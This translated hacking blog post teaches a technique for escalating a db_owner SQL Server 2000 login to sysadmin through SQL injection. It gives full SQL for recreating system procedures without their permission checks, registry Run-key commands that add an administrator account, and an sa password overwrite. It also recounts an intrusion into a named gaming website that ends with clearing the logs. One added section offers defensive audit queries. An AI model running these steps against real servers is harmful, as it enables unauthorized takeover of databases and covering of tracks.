Blog statement: This article is for teaching purposes only, and the author takes no responsibility for the consequences of any attack based on it. Because the content is so damaging, the original text has been cut down and modified; even so, what remains is still dangerous, so please do not carry out destructive operations against domestic sites. After much hesitation I decided to publish it anyway.

The technique described here has a very wide range of application: as long as a website has a SQL injection vulnerability, this method will get you a WebShell or even system privileges in about 99% of cases (I do not dare say 100%, although in hundreds of my own "practical exercises" it has basically always produced a WebShell or system privileges).

In "MSSQL DB_OWNER Role Injection Directions (Continued)" I described a method that uses xp_regwrite to obtain system privileges:

```sql
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'xwq1', 'REG_SZ', 'net user xwq xwq /add'
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'xwq2', 'REG_SZ', 'net localgroup administrators xwq /add'
```

As soon as the server hosting the site is restarted, you have system privileges. After hundreds of real experiments, however, this method proved impractical: it easily attracts the network administrator's attention, and forcing a restart with DDoS is illegal (and costs a lot of manpower and resources, depending on how many compromised hosts you have). So it is not feasible unless you want that server very badly. Enough preamble; you are probably impatient by now. Here is one of my three "killer" techniques: the universal privilege-escalation method.
Suppose a website has a SQL injection vulnerability and the web application connects as a member of the sysadmin fixed server role (in plain terms, as SA). Getting a WebShell or system privileges is then trivial; as far as I know there are about ten ways to go from sysadmin to a WebShell or system privileges, probably more, and I will not dwell on them because everyone here knows them better than I do. But what if the website's login only has db_owner permission? How do you get system privileges or a WebShell then (assuming no upload vulnerability and no database backup)? Most people would answer "back up a shell", but as LCX said in "MSSQL DB_OWNER Role Injection for System Privileges", the backup shell is largely theoretical: if the WebShell ends up 20 MB, can you really use it? So what is your reaction if I tell you that db_owner has more ways to get a WebShell or system privileges than sysadmin does? Incredible, or am I bluffing? (Those who do not believe me need not read further.) Are your fingers itching? Fine, I will stop talking and present my third killer technique, the universal privilege-escalation method.

Before the explanation, set up an experimental environment: Windows XP SP1 with SQL Server 2000 SP3, and follow along step by step. First create a login with only db_owner permission; mine is called xwq (select nothing under server roles and tick db_owner under database roles). Now open Query Analyzer as xwq and run sp_addlogin xuwenqiang. What do we get?

Server: Msg 2571, Level 14, State 2, Procedure sp_addlogin, Line 16
User 'xwq' does not have permission to run DBCC auditevent.
Server: Msg 15247, Level 16, State 1, Procedure sp_addlogin, Line 17
User does not have permission to perform this action.
The error above is expected: only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin. So how can we make sp_addlogin run for us? Look at the source of sp_addlogin:

```sql
create procedure sp_addlogin
    @loginame    sysname,
    @passwd      sysname = Null,
    @defdb       sysname = 'master',     -- UNDONE: DEFAULT CONFIGURABLE???
    @deflanguage sysname = Null,
    @sid         varbinary(16) = Null,
    @encryptopt  varchar(20) = Null
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret int   -- return value of sp call

    -- CHECK PERMISSIONS --
    if (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end

    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL login)
    --  (2) No backslash (NT users only)
    --  (3) Not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end
    -- Note: different case of sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- LOGIN NAME MUST NOT ALREADY EXIST --
    if exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end

    -- VALIDATE DEFAULT DATABASE --
    if db_id(@defdb) is null
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end

    -- VALIDATE DEFAULT LANGUAGE --
    if (@deflanguage is not null)
    begin
        execute @ret = sp_validlang @deflanguage
        if (@ret <> 0)
            return (1)
    end
    else
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid   -- server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end

    -- VALIDATE SID IF GIVEN --
    if ((@sid is not null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) is not null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end

    -- VALIDATE AND USE ENCRYPTION OPTION --
    declare @xstatus smallint
    select @xstatus = 2   -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800,   -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end

    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
    insert into master.dbo.sysxlogins values
        (NULL, @sid, @xstatus, getdate(), getdate(), @loginame,
         convert(varbinary(256), @passwd), db_id(@defdb), @deflanguage)
    if @@error <> 0   -- this indicates we saw a duplicate row
        return (1)

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    raiserror(15298,-1,-1)
    return (0)   -- sp_addlogin
go
```

Only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin, and the reason is this block:

```sql
    -- CHECK PERMISSIONS --
    if (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
```

Cut this block out, and a login can be added from any permission level.
So first delete the procedure:

```sql
drop procedure sp_addlogin
```

Then recreate it with exactly the same create procedure sp_addlogin text as in the listing above, except that the "CHECK PERMISSIONS" block is left out. I only want to add a login, so that is all that needs to change. Now run sp_addlogin xuwenqiang in Query Analyzer: a new login is created.
I have created the login xuwenqiang, but on its own it is useless; I want to give it the highest privilege, which in SQL Server is sysadmin. The only way to make a login sysadmin is the stored procedure sp_addsrvrolemember, and again only sysadmin members may execute it. Smart readers will already see how to use sp_addsrvrolemember with only db_owner permission: exactly as with sp_addlogin, remove the permission check from sp_addsrvrolemember and we can add anyone to sysadmin. Here is its source:

```sql
create procedure sp_addsrvrolemember
    @loginame sysname,          -- login name
    @rolename sysname = NULL    -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret int,           -- return value of sp call
            @rolebit smallint,
            @ismem int

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end

    -- AUDIT A SUCCESSFUL SECURITY CHECK --
    dbcc auditevent (108, 1, 1, @loginame, NULL, @rolename, NULL)

    -- CANNOT CHANGE SA ROLES --
    if @loginame = 'sa'
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = case @rolename
                        when 'sysadmin'      then 16
                        when 'securityadmin' then 32
                        when 'serveradmin'   then 64
                        when 'setupadmin'    then 128
                        when 'processadmin'  then 256
                        when 'diskadmin'     then 512
                        when 'dbcreator'     then 1024
                        when 'bulkadmin'     then 4096
                        else NULL
                      end

    -- ADD ROW FOR NT LOGIN IF NEEDED --
    if not exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end

    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins
        set xstatus = xstatus | @rolebit, xdate2 = getdate()
        where name = @loginame and srvid is null

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')
    raiserror(15488,-1,-1,@loginame,@rolename)

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    return (@@error)   -- sp_addsrvrolemember
go
```

Delete this block:

```sql
    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end
```

and anyone can be added to sysadmin. Run sp_addsrvrolemember xuwenqiang, sysadmin in Query Analyzer: success.
So, starting from a login with only db_owner permission, we have created a new login xuwenqiang with sysadmin, the highest privilege in SQL Server; from there a WebShell or system privileges is no longer difficult. Do not fix your attention on these two stored procedures alone. If sysadmin by itself is not enough, the same universal method applies to others: sp_configure, sp_addlinkedserver, sp_addlinkedsrvlogin, sp_makewebtask, and so on. Many procedures that require sysadmin permission can be made to serve us this way. Let us take a second example: using the universal method to create a perfect back door that can never be removed. Everyone knows SQL Server has a built-in back door, the sa login: sa is the built-in administrator login and, according to M$, cannot be changed or deleted (if you have read my other article, "Completely delete the sa back door", you know sa can be deleted after all). sp_password changes a login's password, but you must know the old password to use it. Is there a way to change the sa password without knowing the old one? Yes. sp_configure displays or changes server-wide configuration settings, and by default execute permission on sp_configure (to change options) is granted to the sysadmin and serveradmin fixed server roles. Removing the permission check from sp_configure and recreating it is just as easy as before, and we will use that next.
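From the defender's side, the steps above (dropping and recreating system procedures in master, adding a login, setting its sysadmin bit, and opening system tables for direct edits) all leave traces that can be audited. The following T-SQL is an added example written for this page, not code from the original article or from Microsoft; it assumes the SQL Server 2000 system tables the article itself uses (sysobjects, syscomments, sysxlogins, sysconfigures, spt_values) and the sysadmin bit value 16 from sp_addsrvrolemember.

```sql
-- Added defensive audit for SQL Server 2000 (example code, not from the article).
-- Run as a sysadmin member: sysxlogins is only readable by sysadmin.
-- On SQL Server 2005 and later these are compatibility views and system
-- procedures live in the read-only resource database, so the drop/recreate
-- trick no longer applies, but the role and configuration checks still do.
use master
go

-- 1. Were the procedures the technique tampers with dropped and recreated?
--    A recreated copy gets a fresh crdate, loses the IsMSShipped flag, and
--    (if built as the article describes) has no is_srvrolemember() check.
select o.name,
       o.crdate,
       objectproperty(o.id, 'IsMSShipped') as ms_shipped,
       case when exists (select 1 from syscomments c
                         where c.id = o.id
                           and c.text like '%is_srvrolemember%')
            then 'permission check present'
            else 'PERMISSION CHECK MISSING' end as check_status
from sysobjects o
where o.type = 'P'
  and o.name in ('sp_addlogin', 'sp_addsrvrolemember', 'sp_configure',
                 'sp_password', 'sp_addlinkedserver', 'sp_addlinkedsrvlogin')
order by o.name
go

-- 2. Who is sysadmin right now? xstatus bit 16 is the value that
--    sp_addsrvrolemember ORs in for 'sysadmin'; xdate2 is the last change.
select name,
       xdate1 as created,
       xdate2 as last_changed,
       case when sid = 0x01 then 'built-in sa' else 'granted' end as origin
from sysxlogins
where srvid is null
  and (xstatus & 16) = 16
order by xdate2 desc
go

-- 3. Is direct editing of system tables switched on ('allow updates' = 1)?
--    Read sysconfigures directly instead of calling sp_configure, since the
--    procedure itself may have been replaced.
select v.name, c.value as configured_value
from spt_values v
     join sysconfigures c on v.number = c.config
where v.type = 'C'
  and v.name = 'allow updates'
go

-- 4. Logins created or modified in the last day. A login inserted through a
--    recreated sp_addlogin still receives getdate() in xdate1 and xdate2.
select name, xdate1, xdate2, xstatus
from sysxlogins
where srvid is null
  and (xdate1 > dateadd(day, -1, getdate())
       or xdate2 > dateadd(day, -1, getdate()))
order by xdate2 desc
go
```

Any row in query 1 with ms_shipped = 0 or a recent crdate, any unexpected name in query 2, or a value of 1 in query 3 is worth an incident ticket; query 4 narrows the time window once something is found.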
Here is sp_configure, rebuilt without its permission check:

```sql
create procedure sp_configure    --- 1996/08/14 09:43
    @configname varchar(35) = NULL   -- option name to configure
   ,@configvalue int = NULL          -- new configuration value
as
    set nocount on
    declare @confignum int           -- number of the option to be configured
           ,@configcount int         -- number of options like @configname
           ,@show_advance int        -- Y/N read & write actions on "advanced" options
    declare @fullconfigname varchar(35)
    declare @prevvalue int

    /*
    **  Determine @show_advance from the "show advanced options" setting in syscurconfigs.
    */
    if (select value from master.dbo.syscurconfigs where config = 518) = 1
        select @show_advance = 1   -- display advanced options
    else
        select @show_advance = 0   -- do not display advanced options

    /*
    **  Make certain that max user info reflects any addpak upgrades.
    */
    if (select high from master.dbo.spt_values where number = 103 and type = 'C') <> @@max_connections
        update master.dbo.spt_values set high = @@max_connections
            where number = 103 and type = 'C'

    /*
    **  If no option name is given, the procedure will just print out all the
    **  options and their values.
    */
    if @configname is null
    begin
        select name, minimum = low, maximum = high,
               config_value = c.value, run_value = master.dbo.syscurconfigs.value
        from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs
        where type = 'C'
          and number = c.config
          and number = master.dbo.syscurconfigs.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        order by lower(name)
        return (0)
    end

    /*
    **  Use @configname and try to find the right option.
    **  If there isn't just one, print appropriate diagnostics and return.
    */
    select @configcount = count(*), @fullconfigname = min(v.name), @prevvalue = min(c.value)
    from master.dbo.spt_values v, master.dbo.sysconfigures c
    where v.name like '%' + @configname + '%' and v.type = 'C'
      and v.number = c.config
      and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

    /*
    **  If no option, show the user what the options are.
    */
    if @configcount = 0
    begin
        raiserror(15123,-1,-1,@configname)
        print ' '
        raiserror(15456,-1,-1)
        /*
        **  Show the user what the options are.
        */
        select name, minimum = low, maximum = high,
               config_value = c.value, run_value = master.dbo.syscurconfigs.value
        from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs
        where type = 'C'
          and number = c.config
          and number = master.dbo.syscurconfigs.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        return (1)
    end

    /*
    **  If more than one option like @configname, show the duplicates and return.
    */
    if @configcount > 1
    begin
        raiserror(15124,-1,-1,@configname)
        print ' '
        select duplicate_options = name
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where name like '%' + @configname + '%' and type = 'C'
          and number = c.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        return (1)
    end
    else
        /* Otherwise get the full name. */
        select @configname = name   --, @value_in_sysconfigures = c.value
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where name like '%' + @configname + '%' and type = 'C'
          and number = c.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

    /*
    **  If @configvalue is null, just show the current state of the option.
    */
    if @configvalue is null
    begin
        select v.name, v.low as 'minimum', v.high as 'maximum',
               c.value as 'config_value', u.value as 'run_value'
        from master.dbo.spt_values v
             left outer join master.dbo.sysconfigures c on v.number = c.config
             left outer join master.dbo.syscurconfigs u on v.number = u.config
        where v.type = 'C' and v.name like '%' + @configname + '%'
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        return (0)
    end

    /*
    **  Now get the configuration number.
    */
    select @confignum = number
    from master.dbo.spt_values, master.dbo.sysconfigures c
    where type = 'C'
      and (@configvalue between low and high or @configvalue = 0)
      and name like '%' + @configname + '%'
      and number = c.config
      and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

    /*
    **  If this is the number of default language, we want to make sure
    **  that the new value is a valid language id in syslanguages.
    */
    if @confignum = 124
    begin
        if not exists (select * from master.dbo.syslanguages where langid = @configvalue)
        begin
            /* 0 is default language, us_english */
            if @configvalue <> 0
            begin
                raiserror(15127,-1,-1)
                return (1)
            end
        end
    end

    /*
    **  If this is the number of kernel language, we want to make sure
    **  that the new value is a valid language id in syslanguages.
    */
    if @confignum = 132
    begin
        if not exists (select * from master.dbo.syslanguages where langid = @configvalue)
        begin
            /* 0 is default language, us_english */
            if @configvalue <> 0
            begin
                raiserror(15028,-1,-1)
                return (1)
            end
        end
    end

    /*
    **  "user options" should not try to set incompatible options/values.
    */
    if @confignum = 1534   -- "user options"
    begin
        if (@configvalue & (1024 | 2048)) = (1024 | 2048)   -- ansi_null_default_on/off
        begin
            raiserror(15303,-1,-1,@configvalue)
            return (1)
        end
    end

    /*
    **  Although the @configname is a valid option, the @configvalue is out of range.
    */
    if @confignum is null
    begin
        raiserror(15129,-1,-1,@configvalue,@configname)
        return (1)
    end

    -- msg 15002, but in 6.5 allow this inside a txn (do not check @@trancount) #12828

    /*
    **  Now update sysconfigures.
    */
    update master.dbo.sysconfigures set value = @configvalue where config = @confignum

    /*
    **  Flush the procedure cache. This is to account for options which become
    **  effective immediately (i.e. do not need a server restart).
    */
    dbcc freeproccache

    raiserror(15457,-1,-1,@fullconfigname,@prevvalue,@configvalue) with log
    return (0)   -- sp_configure
go
```

Now we can run:

```sql
sp_configure 'allow updates', 1
go
reconfigure with override
go
```

and the sa password can be changed directly:

```sql
update sysxlogins
set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC
where sid = 0x01
```

The sa password is now 111111. The other option is to delete sa altogether; for how to do that, see my "Completely delete the sa back door".

Example: what follows is a quick attack test against a well-known domestic site, done to verify the knowledge above. For various reasons I will call the site www.**173.com. It is very well known in gaming, ranked about 20th at the time of my test. I will not say how I found the injection point; anyone can find it, and there is more than one. (The whole test did not really take much time. I do not count writing the program, which I wrote specifically so that I would not have to type the statements by hand; the attack itself took only 10 minutes.)
At the injection point GameType=** (frustrating: had NBSI2 existed at the time of the test, this would have been much more relaxed), first submit

```sql
drop procedure sp_addlogin
```

and then submit through the browser (well, through the program I wrote, which does the input for me) the recreated sp_addlogin: the same create procedure sp_addlogin text as in the listing earlier, with the "CHECK PERMISSIONS" block removed. Now create our login:

```sql
exec master..sp_addlogin xwq
```

Next submit

```sql
drop procedure sp_addsrvrolemember
```

followed by the recreated create procedure sp_addsrvrolemember (again the listing shown earlier, with the "VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS" block removed). Then:

```sql
exec master..sp_addsrvrolemember xwq, sysadmin
```

Connect with a SQL exploitation tool or Query Analyzer and check: success. We have created a login xwq with the highest privileges on the www.**17173.com server, and I think everyone knows what to do from there. Since this was only a security test I did not go deeper; I deleted the account, cleared the log, and left.

So there you have it: one of my killer techniques, the universal privilege-escalation method. Give me an injection point and, whatever the permission level, I will get you a WebShell or even system privileges. Honestly, calling it "universal" is a little exaggerated, because CREATE PROCEDURE permission is granted to members of the sysadmin fixed server role and to members of the db_owner and db_ddladmin fixed database roles, so with only public permission it does not apply. But do not conclude that public permission rules out a WebShell or system privileges: on the contrary, I know at least five methods for a user with only public permission. The best prevention is to eliminate the injection vulnerability itself; that is the cure at the root. (If I gave away the most beautiful method for public permission it would be a pity; unfortunately nothing is lower than public, many dangerous stored procedures cannot be used with it, and public cannot be removed. It seems M$ still loves us after all.)

This article was written at school in April 2004, right after SQL Server was installed. At the end of December I still had not released it because of how harmful it is; I believe a few people in the country knew of it, but it was never public. After much consideration I have decided to release it. I hope everyone will refrain from any destructive operations against domestic sites. I have not described here how a user with only public permission gets a WebShell or system privileges; I know at least five ways, and there may be more (if there are greater masters out there, I hope they will enlighten me). Given the harm involved, I am not publishing those key technical details now; when a suitable opportunity comes I will share that knowledge with everyone without reservation. Once more: do not damage any legal host in any country, or the consequences are your own responsibility.